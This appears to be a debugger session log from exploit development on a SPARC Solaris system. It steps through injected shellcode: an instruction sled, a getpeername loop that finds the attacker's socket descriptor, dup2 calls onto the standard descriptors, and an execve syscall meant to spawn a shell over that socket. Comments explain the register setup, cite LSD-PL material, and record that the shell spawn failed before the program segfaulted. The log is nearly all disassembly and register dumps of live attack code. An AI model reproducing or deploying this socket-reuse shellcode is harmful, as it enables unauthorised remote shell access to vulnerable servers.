%g1 ta 0x8 bgeu 0x6dd84 subcc %l0, 0x1, %l0 bne 0x6dd9c mov 0x3, %l3 add %l0, 0x2, %o0 mov 0x9, %o1 add %l3, -0x1, %o2 mov 0x3e, %g1 addcc %l3, -0x1, %l3 bne 0x6ddd0 ta 0x8 bn,a 0x6dde8 bn,a 0x6ddec call 0x6ddf0 add %o7, 0x20, %o0 add %o0, 0x10, %o1 st %g0, [%o0 + 0x8] st %o0, [%o0 + 0x10] 6dc8c+20:b :c breakpoint at: 6dcac: xor %l1, %l1, %g0 .,10/i 6dcac: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 6dcec: xor %l1, %l1, %g0 6dcac+10:b :c breakpoint at: 6dcbc: xor %l1, %l1, %g0 .,10/i 6dcbc: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 6dcbc+40:b :c 
breakpoint at: 6dcfc: xor %l1, %l1, %g0 .,10/i 6dcfc: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 6dd3c: xor %l1, %l1, %g0 6dd3c:b :c breakpoint at: 6dd3c: xor %l1, %l1, %g0 .20/i bad command .,20/i 6dd3c: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 bn,a 0x6dd5c bn,a 0x6dd60 call 0x6dd64 sethi %hi(0xba94400), %i1 mov 0xff, %l0 mov 0x54, %l1 add %o7, -0x30, %l2 add %o7, 0x28, %l5 jmp %l5 + 0x8 stb %g0, [%o7 + 0x4] ld [%o7 - 0x30], %l3 ld [%o7 + 0x4], %l4 subcc %l3, %l4, %l4 be 0x6dd80 add %o7, 0x5c, %l5 st %l1, [%o7 - 0x3c] st %l1, [%o7 - 0x38] st %l2, [%o7 - 0x34] add %l0, 0x1, %o0 sll %l1, 0x8, %l3 or %l3, 0x91, %o1 add %o7, -0x3c, %o2 mov 0x36, %g1 $r g0 0 l0 801c4011 g1 67568 l1 801c4011 g2 0 l2 801c4011 g3 0 l3 801c4011 g4 0 l4 801c4011 g5 0 l5 801c4011 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 6dc80 i0 801c4011 o1 6dc80 i1 801c4011 o2 6dc80 i2 801c4011 o3 6dc80 i3 91d02001 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dc80 i7 91d02001 y 0 tstate: 4482001a04 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x4) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6dd3c 6dd3c: xor %l1, %l1, %g0 npc 6dd40 6dd40: xor %l1, %l1, %g0 :s stopped at: 6dd40: xor %l1, %l1, %g0 :s stopped at: 6dd44: xor %l1, %l1, %g0 :s stopped at: 6dd48: xor %l1, %l1, %g0 :s stopped at: 6dd4c: xor %l1, %l1, %g0 :s stopped at: 6dd50: xor %l1, %l1, %g0 :s stopped at: 6dd54: xor %l1, %l1, %g0 :s stopped at: 6dd58: xor %l1, %l1, %g0 :s stopped at: 6dd5c: xor %l1, %l1, %g0 :s stopped at: 6dd60: bn,a 0x6dd5c :s stopped at: 6dd68: call 0x6dd64 :s stopped at: 6dd6c: sethi %hi(0xba94400), %i1 :S stopped at: 6dd64: bn,a 
0x6dd60 :s stopped at: 6dd6c: sethi %hi(0xba94400), %i1 :s stopped at: 6dd70: mov 0xff, %l0 :s stopped at: 6dd74: mov 0x54, %l1 :s stopped at: 6dd78: add %o7, -0x30, %l2 :s stopped at: 6dd7c: add %o7, 0x28, %l5 :S stopped at: 6dd80: jmp %l5 + 0x8 :s stopped at: 6dd84: stb %g0, [%o7 + 0x4] :s stopped at: 6dd98: add %o7, 0x5c, %l5 :s stopped at: 6dd9c: st %l1, [%o7 - 0x3c] :s stopped at: 6dda0: st %l1, [%o7 - 0x38] :s stopped at: 6dda4: st %l2, [%o7 - 0x34] :s stopped at: 6dda8: add %l0, 0x1, %o0 :s stopped at: 6ddac: sll %l1, 0x8, %l3 :s stopped at: 6ddb0: or %l3, 0x91, %o1 :s stopped at: 6ddb4: add %o7, -0x3c, %o2 :s stopped at: 6ddb8: mov 0x36, %g1 :s stopped at: 6ddbc: ta 0x8 /* For getPeername system call, refer to LSD-PL doc for correct register value. In particular: g1=36, o0=sfd(socket file decriptor), o1=request ID, o2 is pointer to structure {54 54 pointerInternetAdd} for our case is 6dd2c. returnAdd point to the memory next to it , which is 6dd38 */ $r g0 0 l0 ff g1 36 l1 54 g2 0 l2 6dd38 g3 0 l3 5400 g4 0 l4 801c4011 g5 0 l5 6ddc4 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 100 i0 801c4011 o1 5491 i1 ba94400 o2 6dd2c i2 801c4011 o3 6dc80 i3 801c4011 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dd68 i7 801c4011 y 0 tstate: 4482001a00 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x0) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6ddbc 6ddbc: ta 0x8 npc 6ddc0 6ddc0: bgeu 0x6dd84 6dd2c/4X 6dd2c: 54 54 6dd38 801c4011 6dd3c: 801c4011 801c4011 801c4011 801c4011 6ddbc/i 6ddbc: ta 0x8 .,10/i 6ddbc: ta 0x8 bgeu 0x6dd84 subcc %l0, 0x1, %l0 bne 0x6dd9c mov 0x3, %l3 add %l0, 0x2, %o0 mov 0x9, %o1 add %l3, -0x1, %o2 mov 0x3e, %g1 addcc %l3, -0x1, %l3 bne 0x6ddd0 ta 0x8 bn,a 0x6dde8 bn,a 0x6ddec call 0x6ddf0 add %o7, 0x20, %o0 stopped at: 6ddd4: mov 0x9, %o1 :s stopped at: 6ddd8: add %l3, -0x1, %o2 :s stopped at: 6dddc: mov 0x3e, %g1 :s stopped at: 6dde0: addcc %l3, -0x1, %l3 :s stopped at: 6dde4: bne 0x6ddd0 :s stopped at: 6dde8: ta 0x8 /* 
After the above getPeername loop iterates from 100 down to 0, it successfully locates the socket fd (8) of the current client. Now it duplicates that fd onto fds 0/1/2 and tries to spawn a shell */ $r g0 0 l0 6 g1 3e l1 54 g2 0 l2 6dd38 g3 0 l3 2 g4 0 l4 0 g5 0 l5 6ddc4 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 8 i0 801c4011 o1 9 i1 ba94400 o2 2 i2 801c4011 o3 6dc80 i3 801c4011 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dd68 i7 801c4011 y 0 tstate: 1182001a02 (ccr=0x11, asi=0x82, pstate=0x1a, cwp=0x2) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6dde8 6dde8: ta 0x8 npc 6ddd0 6ddd0: add %l0, 0x2, %o0 .,10/i 6ddd0: add %l0, 0x2, %o0 mov 0x9, %o1 add %l3, -0x1, %o2 mov 0x3e, %g1 addcc %l3, -0x1, %l3 bne 0x6ddd0 ta 0x8 bn,a 0x6dde8 bn,a 0x6ddec call 0x6ddf0 add %o7, 0x20, %o0 add %o0, 0x10, %o1 st %g0, [%o0 + 0x8] st %o0, [%o0 + 0x10] st %g0, [%o0 + 0x14] mov 0xb, %g1 6de10: ta 0x8 6ddd0/i 6ddd0: add %l0, 0x2, %o0 :c breakpoint at: 6ddd0: add %l0, 0x2, %o0 6ddd0:d :c /*The shell spawn seems to fail for some reason and we did not receive an interactive channel on the client side*/ stopped at: _rt_boot: ba,a _elf_start :c SIGSEGV: Segmentation Fault (address not mapped to object) stopped at: elf_find_sym+0xa4: ld [%o0 + %i2], %o1